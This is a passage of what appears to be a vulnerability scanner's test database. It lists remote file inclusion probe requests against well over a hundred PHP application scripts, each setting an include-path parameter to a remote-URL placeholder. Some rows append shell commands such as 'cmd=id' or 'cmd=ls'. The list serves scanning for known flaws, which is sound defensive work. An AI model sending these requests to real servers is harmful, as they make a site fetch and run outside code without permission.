"005266","5292","c","/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005267","5292","c","/list.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005268","5292","c","/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005269","5292","c","/lms_path/modules/welcome.php?_LIB_DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005270","5292","c","/load_lang.php?_SERWEB[configdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005271","5292","c","/load_lang.php?_SERWEB[serwebdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005272","5292","c","/load_phplib.php?_PHPLIB[libdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005273","5292","c","/loader.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005274","5292","c","/local/lib/lcUser.php?LIBDIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005275","5292","c","/log.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005276","5292","c","/login.php3?cl_headers=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005277","5292","c","/login.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005278","5292","c","/login.php?blog_theme=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005279","5292","c","/login.php?langfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005280","5292","c","/login.php?pachtofile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005281","5292","c","/login.php?srcdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005282","5292","c","/login.php?value=@RFIURL??","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005283","5292","c","/lovecms/install/index.php?step=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005284","5292","c","/m2f/m2f_cron.php?m2f_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005285","5292","c","/m2f/m2f_forum.php?m2f_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005286","5292","c","/m2f/m2f_mailinglist.php?m2f_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005287","5292","c","/m2f/m2f_phpbb204.php?m2f_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005288","5292","c","/maguz.php?site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005289","5292","c","/mail/childwindow.inc.php?form=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005290","5292","c","/mail/childwindow.inc.php?form=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005291","5292","c","/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005292","5292","c","/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005293","5292","c","/mail_this_entry/mail_autocheck.php?pm_path=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005294","5292","c","/main.inc.php?pathtoscript=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005295","5292","c","/main.php?config[search_disp]=true&include_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005296","5292","c","/main.php?id=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005297","5292","c","/main.php?include_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005298","5292","c","/main.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005299","5292","c","/main.php?pageURL=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005300","5292","c","/main.php?pagina=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005301","5292","c","/main/forum/komentar.php?site_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005302","5292","c","/main/main.php?pi=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005303","5292","c","/main/ppcbannerclick.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005304","5292","c","/main/ppcclick.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005305","5292","c","/main_prepend.php?_SERWEB[functionsdir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005306","5292","c","/mainpage.php?docroot=@RFIURL?cmd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005307","5292","c","/mamboleto.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005308","5292","c","/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005309","5292","c","/manage_songs.php?foing_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005310","5292","c","/manager/admin/index.php?MGR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005311","5292","c","/manager/admin/p_ins.php?MGR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005312","5292","c","/manager/admin/u_ins.php?MGR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005313","5292","c","/manager/articles.php?_PX_config[manager_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005314","5292","c","/manager/static/view.php?propID=0&INC=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005315","5292","c","/master.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005316","5292","c","/mcNews/admin/header.php?skinfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005317","5292","c","/mcf.php?content=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005318","5292","c","/mcnews/admin/install.php?l=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005319","5292","c","/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005320","5292","c","/member.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005321","5292","c","/member.php?vwar_root=@RFIURL&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005322","5292","c","/member/usercp_menu.php?script_folder=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005323","5292","c","/members/index.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005324","5292","c","/members/registration.php?INC=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005325","5292","c","/members_help.php?hlp=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005326","5292","c","/membres/membreManager.php?include_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005327","5292","c","/menu.php3?cl_headers=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005328","5292","c","/menu.php?functions_file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005329","5292","c","/mep/frame.php?chem=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005330","5292","c","/microcms/includes/file_manager/special.php?fm_includes_special=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005331","5292","c","/middle.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005332","5292","c","/migrateNE2toNE3.php?_NE[AbsPath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005333","5292","c","/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005334","5292","c","/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005335","5292","c","/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005336","5292","c","/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005337","5292","c","/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005338","5292","c","/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005339","5292","c","/mini-pub.php/front-end/img.php?sFileName=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005340","5292","c","/minimal/wiki.php?page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005341","5292","c","/misc/function.php3?path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005342","5292","c","/mitglieder.php?config[root_ordner]=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005343","5292","c","/mkportal/include/user.php?MK_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005344","5292","c","/mkportal/include/user.php?MK_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005345","5292","c","/mod/authent.php4?rootpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005346","5292","c","/mod/image/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005347","5292","c","/mod/liens/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005348","5292","c","/mod/liste/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005349","5292","c","/mod/special/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005350","5292","c","/mod/texte/index.php?config[pathMod]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005351","5292","c","/mod_membre/inscription.php?chemin=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005352","5292","c","/mod_phpalbum/sommaire_admin.php?chemin=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005353","5292","c","/modernbill/include/html/config.php?DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005354","5292","c","/modifyform.html?code=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005355","5292","c","/mods/business_functions.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005356","5292","c","/mods/config/load.inc.php?moddir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005357","5292","c","/mods/http/load.inc.php?moddir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005358","5292","c","/mods/ui_functions.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005359","5292","c","/module/forum/forum.php?fd=@RFIURL=';","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005360","5292","c","/module/forum/main.php?id=1&main_dir=@RFIURL?&","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005361","5292","c","/modules.php?name=@RFIURL&file=article&sid=2","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005362","5292","c","/modules/4nAlbum/public/displayCategory.php?basepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005363","5292","c","/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005364","5292","c","/modules/Calendar/admin/update.php?calpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005365","5292","c","/modules/Calendar/calendar.php?calpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005366","5292","c","/modules/Calendar/scheme.php?calpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005367","5292","c","/modules/Discipline/CategoryBreakdownTime.php?FocusPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005368","5292","c","/modules/Discipline/CategoryBreakdownTime.php?staticpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005369","5292","c","/modules/Discipline/StudentFieldBreakdown.php?staticpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005370","5292","c","/modules/Forums/admin/admin_styles.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005371","5292","c","/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005372","5292","c","/modules/My_eGallery/index.php?basepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005373","5292","c","/modules/My_eGallery/public/displayCategory.php?basepath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005374","5292","c","/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005375","5292","c","/modules/NukeAI/util.php?AIbasedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005376","5292","c","/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005377","5292","c","/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005378","5292","c","/modules/abook/foldertree.php?baseDir==@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005379","5292","c","/modules/addons/plugin.php?doc_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005380","5292","c","/modules/admin/include/config.php?doc_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005381","5292","c","/modules/admin/include/localize.php?doc_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005382","5292","c","/modules/agendax/addevent.inc.php?agendax_path=@RFIURL&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005383","5292","c","/modules/bank/includes/design/main.inc.php?bank_data[root]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005384","5292","c","/modules/bank/includes/design/main.inc.php?bank_data[root]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005385","5292","c","/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005386","5292","c","/modules/birstday/birst.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005387","5292","c","/modules/birstday/profile_show.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005388","5292","c","/modules/birstday/select.php?exbb[home_path]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005389","5292","c","/modules/blocks/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005390","5292","c","/modules/calendar/index.php?inc_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005391","5292","c","/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005392","5292","c","/modules/calendar/mod_calendar.php?absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005393","5292","c","/modules/calendar/mod_calendar.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005394","5292","c","/modules/certinfo/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005395","5292","c","/modules/character_roster/include.php?mod_root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005396","5292","c","/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005397","5292","c","/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005398","5292","c","/modules/coppermine/themes/default/theme.php?THEME_DIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005399","5292","c","/modules/downloads/lib/LM_Downloads.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005400","5292","c","/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005401","5292","c","/modules/emails/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005402","5292","c","/modules/events/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005403","5292","c","/modules/fax/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005404","5292","c","/modules/files/blocks/latest_files.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005405","5292","c","/modules/files/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005406","5292","c","/modules/files/list.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005407","5292","c","/modules/filters/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005408","5292","c","/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005409","5292","c","/modules/forums/blocks/latest_posts.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005410","5292","c","/modules/global/inc/content.inc.php?sIncPath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005411","5292","c","/modules/groupadm/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005412","5292","c","/modules/groups/headerfile.php?system[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005413","5292","c","/modules/guestbook/index.php?CONFIG[local_root]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005414","5292","c","/modules/history/index.php?full_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005415","5292","c","/modules/home.module.php?repmod=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
